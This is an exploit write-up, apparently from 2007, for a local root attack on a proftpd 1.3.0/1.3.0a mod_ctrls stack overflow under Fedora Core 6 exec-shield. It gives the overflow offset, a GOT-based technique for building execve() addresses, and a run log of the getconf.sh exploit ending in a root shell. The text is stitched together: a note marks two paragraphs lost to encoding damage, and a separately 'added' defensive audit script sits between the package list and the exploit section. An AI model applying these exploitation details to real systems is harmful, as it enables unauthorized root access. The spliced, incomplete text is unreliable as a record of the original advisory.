
proftpd 1.3.0, 1.3.0a mod_ctrls standalone daemon local `one shot' exploit
                                              in Fedora core 6 exec-shield
                                                        (c) Xpl017Elz 2007

(1) Overview

In December 2006, Core Security Technologies reported a stack overflow in proftpd 1.3.0 and 1.3.0a with mod_ctrls enabled.

Advisory URL: http://www.coresecurity.com/?module=ContentMod&action=item&id=1594

[Two paragraphs lost to encoding damage. Recoverable fragments: standalone daemon exploits on RedHat systems running exec-shield; a stack overflow on such systems has to succeed in a single attempt; remote exploits against exec-shield systems; this proftpd case.]

This is a local exploit for proftpd 1.3.0 and 1.3.0a built with the --enable-ctrls option. Because the target is a standalone daemon, it is arguably not far from a remote exploit. Whether the option was enabled can be checked with ftpdctl.

With --enable-ctrls enabled:

--
$ /usr/local/bin/ftpdctl -h
usage: ftpdctl [options]
  -h    displays this message
  -s    specify an alternate local socket
  -v    displays more verbose information

$
--

With it disabled:

--
$ ./ftpdctl -h
ftpdctl:
  Controls support disabled.
  Please recompile proftpd using --enable-ctrls
$
--

For details on mod_ctrls, see the following URL.

http://www.castaglia.org/proftpd/modules/mod_ctrls.html

(2) Vulnerable Packages

proftpd-1.3.0 (stable)  - mod_ctrls compiled
proftpd-1.3.0a (stable) - mod_ctrls compiled
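Added here as a defender's audit check, not part of the original advisory: a shell helper that flags an installed proftpd matching the affected combination (version 1.3.0 or 1.3.0a with mod_ctrls compiled in). It assumes `proftpd -v` prints `ProFTPD Version 1.3.0a` on its first line and `proftpd -l` lists compiled-in modules as `mod_ctrls.c` and so on; the sample outputs at the bottom are constructed.

```shell
#!/bin/sh
# Audit helper (added example, not from the advisory): is this proftpd build
# the affected combination, i.e. 1.3.0/1.3.0a built with --enable-ctrls?

# is_vulnerable_build VERSION_LINE MODULE_LIST
# Returns 0 when the version is 1.3.0 or 1.3.0a and mod_ctrls.c appears in
# the compiled-in module list; 1 otherwise.
is_vulnerable_build() {
    version_line=$1
    module_list=$2
    ver=$(printf '%s\n' "$version_line" | sed -n 's/.*Version \([0-9a-z.]*\).*/\1/p')
    case "$ver" in
        1.3.0|1.3.0a) ;;
        *) return 1 ;;
    esac
    printf '%s\n' "$module_list" | grep -q 'mod_ctrls\.c' || return 1
    return 0
}

# audit_proftpd [BINARY]: run the real binary and report. Assumes
# `proftpd -v` (version) and `proftpd -l` (compiled-in modules).
audit_proftpd() {
    bin=${1:-/usr/local/sbin/proftpd}
    [ -x "$bin" ] || { echo "no proftpd binary at $bin"; return 2; }
    if is_vulnerable_build "$("$bin" -v 2>&1 | head -n 1)" "$("$bin" -l 2>&1)"; then
        echo "AFFECTED: $bin is ProFTPD 1.3.0/1.3.0a built with mod_ctrls; upgrade or rebuild without --enable-ctrls"
        return 0
    fi
    echo "not affected: $bin"
    return 1
}

# Constructed sample outputs for an offline self-check
SAMPLE_VER='ProFTPD Version 1.3.0a'
SAMPLE_MODS='Compiled-in modules:
  mod_core.c
  mod_ctrls.c
  mod_auth.c'
```

Run `audit_proftpd /path/to/proftpd` on a host to get a one-line verdict; the exit status (0 affected, 1 not, 2 binary missing) makes it usable from inventory scripts.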

(3) Exploit

First, as noted above, proftpd must have been built with the configure option --enable-ctrls, and the attacker needs a local account. The environment is local, but because the target is a daemon the attack differs from an ordinary local exploit; it can be called a local daemon exploit.

- Key points

1) A proftpd daemon built with mod_ctrls runs in standalone mode, so the
   attacker must get the exploit right in a single attempt.

2) The daemon runs with uid root (uid=0) and euid nobody. To obtain root,
   the attack has to be combined with a setuid() family call; chmod() alone
   cannot be used to make a local file setuid.

3) Because of how read() is called, NULL bytes cannot be passed in the
   buffer. Without NULL bytes, the randomized addresses below 16MB cannot
   be brute-forced in one attempt.

4) The local ftpdctl program is the way to send input to the daemon.
   Our exploit therefore goes through ftpdctl.

5) On FC5 and FC6 systems, the function's saved %eip pointer sits 540
   bytes in.

6) The process fork()ed by proftpd does not switch its uid to nobody.
   Combined with 2), calling one of the exec family functions, execve(),
   therefore runs with root privileges.

7) (execve()>>16)&0xff is taken from endpwent()'s GOT entry, and
   (execve()>>8)&0xff from srand()'s GOT entry on FC5 and accept()'s GOT
   entry on FC6.

The getconf.sh script automates these steps and runs the exploit.

--
[x82@localhost pr0ftpd]$ id
uid=500(x82) gid=500(x82) groups=500(x82)
[x82@localhost pr0ftpd]$ cat /etc/redhat-release
Fedora Core release 6 (Zod)
[x82@localhost pr0ftpd]$ ./getconf.sh
#
# proftpd 1.3.0, 1.3.0a mod_ctrls standalone daemon local root exploit
# by Xpl017Elz
#
# [+] check mod_ctrls install: [OK]
# [+] find os type: {1} - Fedora Core release 6 (Zod)
# [+] check proftpd binary /usr/local/sbin/proftpd: [OK]
# [+] strcpy()'s plt address: 0x0804a75c
# [+] 12byte %esp move code address: 0x804af7f
# [+] __libc_start_main()'s GOT address: 0x080b21d0
# [+] __libc_start_main()'s PLT address: 0x0804a45c
# [+] get 0xfc byte address (FC5): 0x80a4dda
# [+] virtual address start: 0x08048000
# [+] get null byte physical offset: 0x0000120
# [+] srand()'s GOT POINTER address (FC5): 0x080b2114
# [+] accept()'s GOT POINTER address (FC6): 0x080b2238
# [+] endpwent()'s GOT POINTER address: 0x080b2364
# [+] /tmp/ftp.cl path address: 0x80a9fd5
# [+] make header file
# [+] compile pr0ftpd_modctrls.c
# [*] execute pr0ftpd_modctrls
#
# [+] make shell
# [+] make payload
# [*] execute `/usr/local/bin/ftpdctl'
#
ftpdctl: error receiving response: Operation not permitted
#
# [+] remove files
# [*] exploit successfully!
# [*] It's root shell :-}
#
sh-3.1# id
uid=0(root) gid=0(root) groups=500(x82)
sh-3.1#
--

The attack completes in a single run.

--
By "dong-houn yoU" (Xpl017Elz), in INetCop Security Co., LTD.

MSN & E-mail: szoahc(at)hotmail(dot)com,
              xploit(at)hackermail(dot)com

INetCop Security Home: http://www.inetcop.net
             My World: http://x82.inetcop.org

GPG public key: http://x82.inetcop.org/h0me/pr0file/x82.k3y
--